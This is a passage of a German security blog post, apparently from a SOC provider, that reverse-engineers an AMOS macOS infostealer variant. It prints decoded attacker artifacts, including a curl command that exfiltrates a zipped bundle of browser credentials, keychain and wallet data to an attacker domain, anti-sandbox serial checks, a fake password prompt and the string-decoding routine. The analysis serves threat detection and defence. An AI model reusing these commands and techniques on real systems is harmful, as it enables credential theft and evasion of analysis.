Stunden",[1231],{"type":803,"value":1497,"toc":3607},[1498,1501,1504,1507,1510,1515,1517,1520,1528,1530,1534,1537,1540,1552,1555,1558,1566,1569,1573,1575,1578,1600,1603,1611,1614,1622,1629,1633,1635,1638,1646,1661,1665,1667,1670,1675,1678,1686,1690,1692,1700,1704,1706,1709,1713,1715,1718,1726,1730,1732,1740,1743,1841,1844,1874,1876,1880,1882,1889,1892,1896,1898,1982,1986,1988,1999,2006,2080,2091,2098,2102,2104,2169,2173,2175,2182,2184,2188,2190,2197,2223,2410,2413,2421,2432,2435,2443,2458,2471,2473,2477,2479,2497,2519,2709,2712,2720,2723,2726,2728,2732,2734,2737,2817,2820,2839,2918,2921,2923,2927,2929,2932,2939,2994,2997,3005,3008,3010,3014,3016,3023,3035,3083,3094,3133,3142,3157,3160,3162,3166,3168,3175,3178,3186,3189,3197,3211,3214,3216,3220,3222,3232,3236,3238,3256,3264,3278,3298,3302,3304,3307,3315,3318,3326,3340,3344,3346,3349,3357,3376,3382,3386,3388,3396,3402,3409,3413,3415,3423,3427,3429,3432,3440,3443,3447,3449,3457,3461,3463,3471,3475,3477,3485,3489,3491,3499,3516,3521,3523,3527,3529,3536,3553,3556,3569,3571,3575,3577,3580,3583,3586,3603],[806,1499,1500],{},"Wenn in unserem SOC ein Alert ausgelöst wird, beginnt die Uhr zu laufen: nicht nur für den betroffenen Kunden, sondern für alle Organisationen unter unserem Schutz. Der gefährlichste Moment im modernen Bedrohungsumfeld ist die Intelligence Gap, das Zeitfenster zwischen dem ersten Einsatz einer neuen Malware-Variante und dem Tag, an dem die Branche davon erfährt.",[806,1502,1503],{},"Für eigenständige Security-Teams bedeutet diese Lücke extreme Verwundbarkeit: Man wartet auf ein Vendor-Update oder einen Signatur-Feed, der noch nicht geschrieben wurde. Für unsere Kunden schließt unsere intern entwickelte Shared Threat Intelligence genau dieses Fenster.",[806,1505,1506],{},"Dieser Beitrag ist eine technische Aufschlüsselung, wie wir eine bisher undokumentierte AMOS-Variante (Atomic macOS Stealer) zerlegten und wie aus einem einzigen kompromittierten Endpoint innerhalb weniger Stunden eine flächendeckende Erkennung und Blockierung für alle unsere Kundenumgebungen wurde.",[1508,1509],"hr",{},[1511,1512,1514],"h1",{"id":1513},"der-vorfall-ein-unbekanntes-ioc-szenario","Der Vorfall: Ein unbekanntes IOC-Szenario",[806,1516,816],{},[806,1518,1519],{},"Der Alert traf am 12. März 2026 um 06:25 Uhr Ortszeit ein: Ein macOS-Endpoint war kompromittiert worden. Als unser SOC mit der Analyse der Artefakte begann, standen wir vor einer Situation, die jeder Threat Analyst fürchtet: keine bekannten Datei-Hashes, keine C2-IP-Adressen, keine aussagekräftigen Verhaltenssignaturen in öffentlichen Datenbanken.",[806,1521,1522,1523,1527],{},"Die vollständige Angriffsarchitektur offenbarte sich erst in der Tiefenanalyse. Die Infektion basierte auf einer 15,7 MB großen macOS Universal Binary (x86_64 und ARM64), abgelegt unter ",[1524,1525,1526],"code",{},"/private/tmp/helper",". Das Sample war auf dem kompromittierten System nicht direkt verfügbar; unser Team musste die Infektionskette rekonstruieren und die ursprüngliche Zustellanfrage simulieren, um die Binary manuell aus der Angreifer-Infrastruktur zu beziehen.",[1508,1529],{},[810,1531,1533],{"id":1532},"stage-1-sandbox-prüfungen","Stage 1: Sandbox-Prüfungen",[806,1535,1536],{},"{: .h4-font-size}",[806,1538,1539],{},"Bevor der eigentliche Stealer auf dem Gerät ausgeführt wurde, hatte bereits ein AppleScript-Payload gelaufen. Jeder String darin, jeder Dateipfad, jeder Shell-Befehl, jede URL war über drei benutzerdefinierte arithmetische Funktionen kodiert:",[1541,1542,1544],"div",{"style":1543},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[1545,1546,1550],"pre",{"className":1547,"code":1549,"language":916},[1548],"language-text","on ipbgcjzgqa(a, b)\n -- result[i] = chr(a[i] - b[i])\n\non kwcvvjininv(a, b)\n -- result[i] = chr(a[i] + b[i])\n\non xqylheckjx(a, b, offset)\n -- result[i] = chr(a[i] - b[i] - offset)\n",[1524,1551,1549],{"__ignoreMap":863},[806,1553,1554],{},"Kein einziger String erscheint im Klartext. Was auf den ersten Blick wie bedeutungslose Integer-Arrays aussah, entpuppte sich nach Umkehrung des Kodierungsschemas als vollständiges, einsatzbereites Datendiebstahl- und Exfiltrationsframework.",[806,1556,1557],{},"Wir dekodierten jeden Array im Skript statisch. Die Ergebnisse waren eindeutig:",[1541,1559,1560],{"style":1543},[1545,1561,1564],{"className":1562,"code":1563,"language":916},[1548],"Download URL: https[:]//woupp[.]com/n8n/update\nExfil server: http[:]//92[.]246[.]136[.]14/contact\nExfil method: curl --connect-timeout 120 --max-time 300 -X POST -F \"file=@/tmp/out.zip\"\n",[1524,1565,1563],{"__ignoreMap":863},[806,1567,1568],{},"Die Download-URL imitiert bewusst ein legitimes n8n-Workflow-Automation-Update, ein Tool, das bei Entwicklern und DevOps-Ingenieuren weit verbreitet ist. Das ist kein Zufall: Die Kampagne zielt auf technisch versierte Nutzer, nicht auf gewöhnliche Endnutzer, die gecrackte Software installieren.",[810,1570,1572],{"id":1571},"der-anti-sandbox-check","Der Anti-Sandbox-Check",[806,1574,1536],{},[806,1576,1577],{},"Vor dem Download führte das Skript eine dedizierte VM- und Sandbox-Erkennungsroutine aus. Aus den Incident-Artefakten konnten wir zusätzlich ein eigenständiges Anti-Sandbox-Skript wiederherstellen:",[1541,1579,1580],{"style":1543},[1545,1581,1585],{"className":1582,"code":1583,"language":1584,"meta":863,"style":863},"language-applescript shiki shiki-themes github-light github-dark","set urgufr to do shell script \"system_profiler SPMemoryDataType\"\nset qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n","applescript",[1524,1586,1587,1595],{"__ignoreMap":863},[1588,1589,1592],"span",{"class":1590,"line":1591},"line",1,[1588,1593,1594],{},"set urgufr to do shell script \"system_profiler SPMemoryDataType\"\n",[1588,1596,1597],{"class":1590,"line":864},[1588,1598,1599],{},"set qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n",[806,1601,1602],{},"Die Ergebnisse prüfte das Skript dann gegen zwei Listen. Die erste suchte nach Virtualisierungsmarkierungen in den Speicherdaten:",[1541,1604,1605],{"style":1543},[1545,1606,1609],{"className":1607,"code":1608,"language":916},[1548],"\"QEMU\" \"VMware\" \"KVM\"\n",[1524,1610,1608],{"__ignoreMap":863},[806,1612,1613],{},"Die zweite prüfte Hardware-Identifikatoren gegen eine Liste bekannter Seriennummern von Analysemaschinen:",[1541,1615,1616],{"style":1543},[1545,1617,1620],{"className":1618,"code":1619,"language":916},[1548],"\"Z31FHXYQ0J\" -- known sandbox machine serial\n\"C07T508TG1J2\" -- known sandbox machine serial\n\"C02TM2ZBHX87\" -- known sandbox machine serial\n\"Chip: Unknown\" -- emulation indicator\n\"Intel Core 2\" -- legacy/VM indicator\n",[1524,1621,1619],{"__ignoreMap":863},[806,1623,1624,1625,1628],{},"Bei einer Übereinstimmung: ",[1524,1626,1627],{},"exit 100",", vollständiger Abbruch. Auf einem echten MacBook Pro mit Apple Silicon bestanden alle Prüfungen lautlos, und die Ausführung fuhr fort. Eine Sandbox-Evasionstechnik auf professionellem Niveau, die ablief, bevor ein einziges Byte der Binary heruntergeladen war.",[810,1630,1632],{"id":1631},"einfach-aber-wirkungsvoll-die-gefälschte-passwortabfrage","Einfach, aber wirkungsvoll: Die gefälschte Passwortabfrage",[806,1634,1536],{},[806,1636,1637],{},"Das dekodierte Skript enthielt auch den Dialog für die Privilegienerweiterung via Social Engineering:",[1541,1639,1640],{"style":1543},[1545,1641,1644],{"className":1642,"code":1643,"language":916},[1548],"Title: \"Application wants to install helper\"\nPrompt: \"Required Application Helper. Please enter device\n password to continue.\"\nButton: \"Continue\"\n",[1524,1645,1643],{"__ignoreMap":863},[806,1647,1648,1649,1652,1653,1656,1657,1660],{},"Der Dialog erscheint über einen Standard-macOS-",[1524,1650,1651],{},"display dialog","-Aufruf mit ",[1524,1654,1655],{},"with hidden answer"," und ist optisch nicht von einer echten macOS-Autorisierungsabfrage zu unterscheiden. Das eingegebene Passwort nutzte das Skript, um ",[1524,1658,1659],{},"login -pf \u003Cusername>"," aufzurufen und den Prozess auf Root-Rechte zu heben, noch bevor die Binary ausgeführt wurde.",[810,1662,1664],{"id":1663},"was-das-skript-gesammelt-hat","Was das Skript gesammelt hat",[806,1666,1536],{},[806,1668,1669],{},"Sobald die Binary ausgeführt war, setzte das osascript seinen eigenen Sammlungsablauf fort und griff jede Kategorie sensibler Systemdaten ab. Wir dekodierten alle Sammlungspfade und Ziele:",[1671,1672,1674],"h3",{"id":1673},"browser-daten-alle-chromium-browser-safari","Browser-Daten (alle Chromium-Browser + Safari):",[806,1676,1677],{},"{: .font-size-4}",[1541,1679,1680],{"style":1543},[1545,1681,1684],{"className":1682,"code":1683,"language":916},[1548],"/Login Data /Cookies /Web Data\n/Local Extension Settings/ /IndexedDB/ /Local Storage/leveldb/\n",[1524,1685,1683],{"__ignoreMap":863},[1671,1687,1689],{"id":1688},"macos-keychain","macOS Keychain:",[806,1691,1677],{},[1541,1693,1694],{"style":1543},[1545,1695,1698],{"className":1696,"code":1697,"language":916},[1548],"~/Library/Keychains/login.keychain-db -- accessed directly via cat\n",[1524,1699,1697],{"__ignoreMap":863},[1671,1701,1703],{"id":1702},"apple-notes","Apple Notes",[806,1705,1677],{},[806,1707,1708],{},"Vollständiger Inhalt als HTML mit Zähler-Header exportiert",[1671,1710,1712],{"id":1711},"lokale-dateien","Lokale Dateien",[806,1714,1677],{},[806,1716,1717],{},"Desktop und Dokumente, bis zu 30 MB, mit Fokus auf:",[1541,1719,1720],{"style":1543},[1545,1721,1724],{"className":1722,"code":1723,"language":916},[1548],"pdf doc docx xls xlsx ppt pptx txt rtf\nkey p12 pem cert pfx sql db sqlite\njson xml yaml conf env csv\n",[1524,1725,1723],{"__ignoreMap":863},[1671,1727,1729],{"id":1728},"kryptowährungs-wallets","Kryptowährungs-Wallets",[806,1731,1677],{},[806,1733,1734,1735,1739],{},"Eine hartcodierte Liste von ",[1736,1737,1738],"strong",{},"mehr als 200 Browser-Extension-IDs",", die alle gängigen Wallets abdeckt, darunter MetaMask, Coinbase Wallet, TronLink, Phantom, Keplr, Yoroi, Ledger Live, Trezor Suite, XDEFI und Exodus.",[806,1741,1742],{},"Nach der Sammlung wurden alle Daten in einem zufällig benannten temporären Verzeichnis gebündelt und exfiltriert:",[1541,1744,1745],{"style":1543},[1545,1746,1750],{"className":1747,"code":1748,"language":1749,"meta":863,"style":863},"language-bash shiki shiki-themes github-light github-dark","ditto -c -k --sequesterRsrc \u003Cstaging_dir> /tmp/out.zip\ncurl --connect-timeout 120 --max-time 300 -X POST \\\n -H \"user: \u003Cuuid>\" -H \"BuildID: \u003Chw_profile>\" \\\n -F \"file=@/tmp/out.zip\" laislivon[.]com/contact\n","bash",[1524,1751,1752,1786,1812,1829],{"__ignoreMap":863},[1588,1753,1754,1758,1762,1765,1768,1772,1776,1780,1783],{"class":1590,"line":1591},[1588,1755,1757],{"class":1756},"sScJk","ditto",[1588,1759,1761],{"class":1760},"sj4cs"," -c",[1588,1763,1764],{"class":1760}," -k",[1588,1766,1767],{"class":1760}," --sequesterRsrc",[1588,1769,1771],{"class":1770},"szBVR"," \u003C",[1588,1773,1775],{"class":1774},"sZZnC","staging_di",[1588,1777,1779],{"class":1778},"sVt8B","r",[1588,1781,1782],{"class":1770},">",[1588,1784,1785],{"class":1774}," /tmp/out.zip\n",[1588,1787,1788,1791,1794,1797,1800,1803,1806,1809],{"class":1590,"line":864},[1588,1789,1790],{"class":1756},"curl",[1588,1792,1793],{"class":1760}," --connect-timeout",[1588,1795,1796],{"class":1760}," 120",[1588,1798,1799],{"class":1760}," --max-time",[1588,1801,1802],{"class":1760}," 300",[1588,1804,1805],{"class":1760}," -X",[1588,1807,1808],{"class":1774}," POST",[1588,1810,1811],{"class":1760}," \\\n",[1588,1813,1815,1818,1821,1824,1827],{"class":1590,"line":1814},3,[1588,1816,1817],{"class":1760}," -H",[1588,1819,1820],{"class":1774}," \"user: \u003Cuuid>\"",[1588,1822,1823],{"class":1760}," -H",[1588,1825,1826],{"class":1774}," \"BuildID: \u003Chw_profile>\"",[1588,1828,1811],{"class":1760},[1588,1830,1832,1835,1838],{"class":1590,"line":1831},4,[1588,1833,1834],{"class":1760}," -F",[1588,1836,1837],{"class":1774}," \"file=@/tmp/out.zip\"",[1588,1839,1840],{"class":1774}," laislivon[.]com/contact\n",[806,1842,1843],{},"Die Bereinigung folgte unmittelbar:",[1541,1845,1846],{"style":1543},[1545,1847,1849],{"className":1747,"code":1848,"language":1749,"meta":863,"style":863},"rm -r \u003Cstaging_dir>\nrm /tmp/out.zip\n",[1524,1850,1851,1868],{"__ignoreMap":863},[1588,1852,1853,1856,1859,1861,1863,1865],{"class":1590,"line":1591},[1588,1854,1855],{"class":1756},"rm",[1588,1857,1858],{"class":1760}," -r",[1588,1860,1771],{"class":1770},[1588,1862,1775],{"class":1774},[1588,1864,1779],{"class":1778},[1588,1866,1867],{"class":1770},">\n",[1588,1869,1870,1872],{"class":1590,"line":864},[1588,1871,1855],{"class":1756},[1588,1873,1785],{"class":1774},[1508,1875],{},[1511,1877,1879],{"id":1878},"stage-2-reverse-engineering-der-helper-binary","Stage 2: Reverse Engineering der 'helper' Binary",[806,1881,816],{},[806,1883,1884,1885,1888],{},"Die ",[1524,1886,1887],{},"helper","-Binary ist der Teil, in dem diese Analyse wirklich in die Tiefe geht. Es handelt sich um ein professionell obfuskiertes macOS-Executable, das statische Analyse systematisch erschwert und den größten Reverse-Engineering-Aufwand dieser Untersuchung verursachte.",[806,1890,1891],{},"Die gesamte Analyse wurde mit Ghidra und unserem benutzerdefinierten ARM64-Analyse-Workflow durchgeführt.",[810,1893,1895],{"id":1894},"dateieigenschaften","Dateieigenschaften",[806,1897,1536],{},[1541,1899,1901],{"style":1900},"border-radius: 6px; overflow: hidden; margin: 0.25rem 0",[1902,1903,1905,1906,1905,1922],"table",{"style":1904},"width:100%; border-collapse: collapse; font-size: 0.85rem","\n ",[1907,1908,1909,1910,1905],"thead",{},"\n ",[1911,1912,1913,1914,1913,1919,1909],"tr",{},"\n ",[1915,1916,1918],"th",{"style":1917},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Eigenschaft",[1915,1920,1921],{"style":1917},"Wert",[1923,1924,1909,1925,1909,1935,1909,1944,1909,1952,1909,1962,1909,1972,1905],"tbody",{},[1911,1926,1913,1927,1913,1932,1909],{},[1928,1929,1931],"td",{"style":1930},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Format",[1928,1933,1934],{"style":1930},"Mach-O Universal Binary",[1911,1936,1913,1937,1913,1941,1909],{},[1928,1938,1940],{"style":1939},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Architectures",[1928,1942,1943],{"style":1939},"x86_64 (offset 0x1000) + ARM64 (offset 0x7ec000)",[1911,1945,1913,1946,1913,1949,1909],{},[1928,1947,1948],{"style":1930},"Size",[1928,1950,1951],{"style":1930},"15.7 MB",[1911,1953,1913,1954,1913,1957,1909],{},[1928,1955,1956],{"style":1939},"MD5",[1928,1958,1959],{"style":1939},[1524,1960,1961],{},"4599fdf2fa2099b30d8bbf76703dd634",[1911,1963,1913,1964,1913,1967,1909],{},[1928,1965,1966],{"style":1930},"SHA-1",[1928,1968,1969],{"style":1930},[1524,1970,1971],{},"3992edfb6f885ae5f09f3e69a2578048d6d5bb54",[1911,1973,1913,1974,1913,1977,1909],{},[1928,1975,1976],{"style":1939},"SHA-256",[1928,1978,1979],{"style":1939},[1524,1980,1981],{},"5664800f21d63e448b934bfcdc258b0c7dadb36e88cf4dd71b24e19656a2b78d",[810,1983,1985],{"id":1984},"es-beginnt-vor-main","Es beginnt vor main()",[806,1987,1536],{},[806,1989,1990,1991,1994,1995,1998],{},"Das erste, was wir in Ghidra feststellten: Diese Binary verhält sich nicht wie ein normales Executable. Der eigentliche Einstiegspunkt ist nicht ",[1524,1992,1993],{},"main()",", sondern eine Funktion, die in ",[1524,1996,1997],{},"__mod_init_func"," registriert ist, einem macOS-Mechanismus, der den Dynamic Linker (dyld) anweist, bestimmte Funktionen beim Laden der Binary automatisch auszuführen, noch bevor nutzbarer Code läuft.",[806,2000,2001,2002,2005],{},"Die Init-Funktion bei ",[1524,2003,2004],{},"0x10009f384"," ist der eigentliche Einstiegspunkt der Malware. Hier die Ghidra-Dekompilierung:",[1541,2007,2008],{"style":1543},[2009,2010,2011,2015,2018,2021,2025,2026,2030,2031,2033,2034,2037,2038,2052],"code-block",{},[1588,2012,2014],{"style":2013},"color:#6a737d","// FUN_10009f384 @ 0x10009f384",[2016,2017],"br",{},[1588,2019,2020],{"style":2013},"// __mod_init_func registered — executes before main()",[1588,2022,2024],{"style":2023},"color:#d73a49","void"," ",[1588,2027,2029],{"style":2028},"color:#6f42c1","FUN_10009f384","(",[1588,2032,2024],{"style":2023},")\n{\n ",[1588,2035,2036],{"style":2023},"int"," iVar1;\n",[806,2039,2040,2043,2044,2030,2047,2051],{},[1588,2041,2042],{"style":2013},"// Anti-sandbox delay: usleep(0x37e) = 894 microseconds","\niVar1 = ",[1588,2045,2046],{"style":2028},"_usleep",[1588,2048,2050],{"style":2049},"color:#005cc5","0x37e",");",[806,2053,2054,2057,2060,2061,2063,2064,2067,2068,2071,2072,2075,2076,2079],{},[1588,2055,2056],{"style":2013},"// Indirect jump table — 14-state machine",[1588,2058,2059],{"style":2013},"// Defeats CFG reconstruction in static analysis tools","\n(_(",[1588,2062,1524],{"style":2023}," _)((",[1588,2065,2066],{"style":2023},"ulong",")switchD_10009f43c::switchdataD_1000cd3fc * ",[1588,2069,2070],{"style":2049},"4"," + ",[1588,2073,2074],{"style":2049},"0x10009f440","))(iVar1);\n",[1588,2077,2078],{"style":2023},"return",";\n}",[806,2081,2082,2083,2086,2087,2090],{},"Zwei Dinge stechen sofort heraus. Erstens das 894-Mikrosekunden-",[1524,2084,2085],{},"usleep"," beim Start: ein Anti-Sandbox-Timing-Signal. Schwerwiegender ist die indirekte Sprungtabelle bei ",[1524,2088,2089],{},"0x10009f43c",". Das ist ein berechneter Branch, bei dem die Zieladresse zur Laufzeit aus einer Lookup-Tabelle ermittelt wird. Statische Analysetools können den Control-Flow-Graphen nicht rekonstruieren; Ghidra protokollierte mehrere \"unreachable block\"-Warnungen beim Versuch, den Ausführungspfad zu verfolgen. Das ist so beabsichtigt.",[806,2092,2093,2094,2097],{},"Die Sprungtabelle treibt eine ",[1736,2095,2096],{},"14-Zustands-Ausführungsmaschine"," an. Jeder Zustand führt einen einzelnen diskreten Schritt der Entschlüsselungs- und Ausführungspipeline durch. Der Zustandszähler wird nach jedem Schritt aktualisiert, und die Maschine läuft, bis alle Zustände durchlaufen sind.",[810,2099,2101],{"id":2100},"der-arm64-disassembly-des-state-dispatchers","Der ARM64 Disassembly des State Dispatchers",[806,2103,1536],{},[1541,2105,2106],{"style":1543},[1545,2107,2111],{"className":2108,"code":2109,"language":2110,"meta":863,"style":863},"language-asm shiki shiki-themes github-light github-dark","10009f3fc: stp xzr,xzr,[sp, #0x48]\n10009f41c: mov w0,#0x37e\n10009f420: bl 0x1000a0fa8 ; _usleep(0x37e) — 894µs anti-sandbox\n10009f424: cmp w25,#0xd ; state counter \u003C 14?\n10009f428: b.hi 0x10009fd44 ; exit if done\n10009f42c: mov w8,w25 ; current state index\n10009f430: adr x9,0x10009f440 ; base of jump table\n10009f434: ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n10009f438: add x9,x9,x10, LSL #0x2 ; compute target address\n10009f43c: br x9 ; indirect branch, CFG broken here\n","asm",[1524,2112,2113,2118,2123,2128,2133,2139,2145,2151,2157,2163],{"__ignoreMap":863},[1588,2114,2115],{"class":1590,"line":1591},[1588,2116,2117],{},"10009f3fc: stp xzr,xzr,[sp, #0x48]\n",[1588,2119,2120],{"class":1590,"line":864},[1588,2121,2122],{},"10009f41c: mov w0,#0x37e\n",[1588,2124,2125],{"class":1590,"line":1814},[1588,2126,2127],{},"10009f420: bl 0x1000a0fa8 ; _usleep(0x37e) — 894µs anti-sandbox\n",[1588,2129,2130],{"class":1590,"line":1831},[1588,2131,2132],{},"10009f424: cmp w25,#0xd ; state counter \u003C 14?\n",[1588,2134,2136],{"class":1590,"line":2135},5,[1588,2137,2138],{},"10009f428: b.hi 0x10009fd44 ; exit if done\n",[1588,2140,2142],{"class":1590,"line":2141},6,[1588,2143,2144],{},"10009f42c: mov w8,w25 ; current state index\n",[1588,2146,2148],{"class":1590,"line":2147},7,[1588,2149,2150],{},"10009f430: adr x9,0x10009f440 ; base of jump table\n",[1588,2152,2154],{"class":1590,"line":2153},8,[1588,2155,2156],{},"10009f434: ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n",[1588,2158,2160],{"class":1590,"line":2159},9,[1588,2161,2162],{},"10009f438: add x9,x9,x10, LSL #0x2 ; compute target address\n",[1588,2164,2166],{"class":1590,"line":2165},10,[1588,2167,2168],{},"10009f43c: br x9 ; indirect branch, CFG broken here\n",[810,2170,2172],{"id":2171},"sechs-gestapelte-obfuskierungsschichten","Sechs gestapelte Obfuskierungsschichten",[806,2174,1536],{},[806,2176,2177,2178,2181],{},"Die Binary verwendet sechs verschiedene Obfuskierungsschichten, gestapelt und verkettet, sodass die Ausgabe jeder Schicht in die nächste eingespeist wird. Jeder Payload, jeder String, jede interne Konstante ist kodiert. Im ",[1524,2179,2180],{},"__const","-Segment erscheint nichts Bedeutungsvolles im Klartext. Was folgt, ist eine vollständige schichtweise Aufschlüsselung, direkt in Ghidra verifiziert, bis hinunter zu einzelnen ARM64-Instruktionen. Jede der verwendeten Techniken ist für sich allein bekannt; ihre verkettete Anwendung über mehrere Stufen schuf jedoch einen stark voneinander abhängigen Ausführungsfluss, der die statische und dynamische Analyse erheblich erschwerte.",[1508,2183],{},[1671,2185,2187],{"id":2186},"layer-1-compile-time-triplet-kodierung","Layer 1: Compile-Time-Triplet-Kodierung",[806,2189,1677],{},[806,2191,2192,2193,2196],{},"Kein String in der Binary ist als Zeichenfolge gespeichert, sondern als Sequenz von 12-Byte-Arithmetik-Triplets. Jedes Triplet ",[1524,2194,2195],{},"(a, b, shift)"," kodiert genau ein Ausgabezeichen. Das Kodierungsschema wird zur Kompilierzeit angewendet, sodass kein String jemals als Klartext in der Binary existiert, nicht einmal vorübergehend beim Laden.",[806,2198,2199,2200,2203,2204,2207,2208,2211,2212,2203,2215,2218,2219,2222],{},"Zwei separate Decoder-Funktionen behandeln unterschiedliche String-Größen. ",[1524,2201,2202],{},"FUN_100087c08"," bei ",[1524,2205,2206],{},"0x100087c08"," dekodiert 60-Zeichen-Strings (720 Byte Eingabedaten aus ",[1524,2209,2210],{},"DAT_1006292cc","). ",[1524,2213,2214],{},"FUN_10007ad80",[1524,2216,2217],{},"0x10007ad80"," dekodiert 56-Zeichen-Strings (672 Byte aus ",[1524,2220,2221],{},"DAT_10049708c","). Beide verwenden denselben Algorithmus.",[1541,2224,2225],{"style":1543},[2009,2226,2227,2230,2232,2235,2025,2237,2030,2239,2242,2243,2245,2246,2248,2249,2251,2252,2255,2256],{},[1588,2228,2229],{"style":2013},"// FUN_100087c08 @ 0x100087c08",[2016,2231],{},[1588,2233,2234],{"style":2013},"// Triplet decoder, 60 chars, data from DAT_1006292cc",[1588,2236,2024],{"style":2023},[1588,2238,2202],{"style":2028},[1588,2240,2241],{"style":2023},"long"," *param_1)\n{\n ",[1588,2244,2241],{"style":2023}," *plVar1;\n ",[1588,2247,2024],{"style":2023}," *pvVar2;\n ",[1588,2250,2241],{"style":2023}," lVar3;\n ",[1588,2253,2254],{"style":2023},"uint"," *puVar4;\n",[806,2257,2258,2259,2030,2262,2265,2266,2271,2274,2275,2265,2277,2280,2282,2285,2286,2289,2290,2265,2293,2296,2297,2299,2300,2063,2302,2304,2305,2308,2309,2312,2313,2315,2316,2319,2320,2323,2324,2063,2327,2329,2330,2333,2334,2337,2339,2342,2343,2063,2345,2347,2348,2350,2351,2353,2354,2359,2360,2363,2364,2369,2370,2373,2374,2376,2377,2382,2383,2385,2386,2388,2389,2392,2393,2396,2397,2265,2399,2402,2404,2407,2408,2079],{},"pvVar2 = ",[1588,2260,2261],{"style":2028},"operator_new",[1588,2263,2264],{"style":2049},"0x2d0","); ",[1588,2267,2268,2269],{"style":2013},"// allocate 720 bytes (60 triplets × 12)",[2016,2270],{},[1588,2272,2273],{"style":2028},"_memcpy","(pvVar2, &DAT_1006292cc, ",[1588,2276,2264],{"style":2049},[1588,2278,2279],{"style":2013},"// copy encoded triplets from __const",[2016,2281],{},[1588,2283,2284],{"style":2028},"FUN_1000a0840","(param_1, ",[1588,2287,2288],{"style":2049},"0x3c",", ",[1588,2291,2292],{"style":2049},"0",[1588,2294,2295],{"style":2013},"// init 60-char output buffer","\nlVar3 = ",[1588,2298,2292],{"style":2049},";\npuVar4 = (",[1588,2301,2254],{"style":2023},[1588,2303,2241],{"style":2023},")pvVar2 + ",[1588,2306,2307],{"style":2049},"8",");\n",[1588,2310,2311],{"style":2023},"do"," {\nplVar1 = (",[1588,2314,2241],{"style":2023}," _)_param_1;\n",[1588,2317,2318],{"style":2023},"if"," (-",[1588,2321,2322],{"style":2049},"1"," \u003C _(",[1588,2325,2326],{"style":2023},"char",[1588,2328,2241],{"style":2023},")param_1 + ",[1588,2331,2332],{"style":2049},"0x17",")) {\nplVar1 = param_1;\n}\n",[1588,2335,2336],{"style":2013},"// THE DECODE FORMULA, one character per triplet:",[2016,2338],{},[1588,2340,2341],{"style":2013},"// char = ((b _ 3) XOR a) >> shift) - b","\n_(",[1588,2344,2326],{"style":2023},[1588,2346,2241],{"style":2023},")plVar1 + lVar3) =\n(",[1588,2349,2326],{"style":2023},")((",[1588,2352,2036],{"style":2023},")(puVar4",[1588,2355,2356,2357],{},"-",[1588,2358,2322],{"style":2049}," * ",[1588,2361,2362],{"style":2049},"3"," ^ puVar4",[1588,2365,2356,2366],{},[1588,2367,2368],{"style":2049},"2",") >> (*puVar4 & ",[1588,2371,2372],{"style":2049},"0x1f",")) - (",[1588,2375,2326],{"style":2023},")puVar4",[1588,2378,2379],{},[1588,2380,2381],{"style":2049},"-1",";\nlVar3 = lVar3 + ",[1588,2384,2322],{"style":2049},";\npuVar4 = puVar4 + ",[1588,2387,2362],{"style":2049},"; ",[1588,2390,2391],{"style":2013},"// advance 12 bytes — next triplet","\n} ",[1588,2394,2395],{"style":2023},"while"," (lVar3 != ",[1588,2398,2288],{"style":2049},[1588,2400,2401],{"style":2013},"// loop exactly 60 times",[2016,2403],{},[1588,2405,2406],{"style":2028},"operator_delete","(pvVar2);\n",[1588,2409,2078],{"style":2023},[806,2411,2412],{},"Der entsprechende ARM64-Assembly, wobei jede Instruktion direkt einer Operation in der Formel entspricht:",[1541,2414,2415],{"style":1543},[1545,2416,2419],{"className":2417,"code":2418,"language":916},[1548],"100087c48: add x9,x20,#0x8\n100087c4c: ldp w10,w11,[x9, #-0x8] ; load a → w10, b → w11\n100087c50: add w12,w11,w11, LSL #0x1 ; w12 = b + (b \u003C\u003C 1) = b * 3\n ; (compiler avoids MUL instruction)\n100087c54: eor w10,w12,w10 ; w10 = (b*3) XOR a\n100087c58: ldr w12,[x9], #0xc ; w12 = shift value; post-increment by 12\n100087c5c: asr w10,w10,w12 ; arithmetic right shift — sign bit preserved\n100087c60: sub w10,w10,w11 ; subtract b — final decoded character\n100087c74: strb w10,[x11, x8, LSL ] ; store one byte to output buffer\n100087c78: add x8,x8,#0x1\n100087c7c: cmp x8,#0x3c ; loop counter vs. 60\n100087c80: b.ne 0x100087c4c ; continue until all 60 chars decoded\n",[1524,2420,2418],{"__ignoreMap":863},[806,2422,2423,2424,2427,2428,2431],{},"Bemerkenswert: Die Multiplikation ",[1524,2425,2426],{},"b × 3"," ist als ",[1524,2429,2430],{},"add w12, w11, w11, LSL #1"," implementiert, ein Shift-and-Add, der eine Multiplikationsinstruktion vollständig vermeidet. Das ist eine klassische Compiler-Optimierung, die den Code zugleich schwerer per Signatur-Matching auffindbar macht.",[806,2433,2434],{},"Die vollständige Dekodierungsformel:",[1541,2436,2437],{"style":1543},[1545,2438,2441],{"className":2439,"code":2440,"language":916},[1548],"char = ASR( (b × 3) XOR a, shift ) − b\n",[1524,2442,2440],{"__ignoreMap":863},[806,2444,2445,2446,2449,2450,2453,2454,2457],{},"Der ",[1524,2447,2448],{},"ASR"," (Arithmetic Shift Right) ist entscheidend: Er bewahrt das Vorzeichenbit. Wenn das Zwischenergebnis von ",[1524,2451,2452],{},"(b×3) XOR a"," negativ ist, was häufig vorkommt, würde ein logischer Shift ein völlig anderes Ergebnis liefern. Das ist beabsichtigt: Wer die Formel in einer höheren Programmiersprache mit ",[1524,2455,2456],{},">>"," nachimplementiert, erhält stillschweigend falsche Ausgaben, sofern die vorzeichenbehaftete Arithmetik nicht explizit berücksichtigt wird.",[806,2459,2460,2461,2463,2464,2466,2467,2470],{},"Die 56-Zeichen-Variante ",[1524,2462,2214],{}," ist strukturell identisch, arbeitet auf ",[1524,2465,2221],{}," mit einem Loop-Limit von ",[1524,2468,2469],{},"0x38",". Beide Funktionen wurden während dieser Analyse live in Ghidra bestätigt.",[1508,2472],{},[1671,2474,2476],{"id":2475},"layer-2-hex-string-kodierung","Layer 2: Hex-String-Kodierung",[806,2478,1677],{},[806,2480,2481,2482,2485,2486,2203,2489,2492,2493,2496],{},"Die von Layer 1 erzeugten Rohbytes sind selbst ASCII-Hex-Zeichen, keine 